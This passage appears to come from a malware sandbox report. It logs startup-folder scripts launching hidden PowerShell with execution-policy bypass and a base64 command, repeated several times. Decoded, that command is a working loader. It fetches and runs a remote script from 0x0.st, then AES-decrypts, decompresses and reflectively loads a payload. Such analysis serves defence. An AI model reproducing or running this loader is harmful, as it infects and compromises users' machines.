kkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_b9543b98.cmd" "
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_b9543b98.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_9932b526.cmd" "
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_9932b526.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_47a8d5aa.cmd" "
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_47a8d5aa.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_b38e7755.cmd" "
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_b38e7755.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_50006331.cmd" "
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_50006331.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5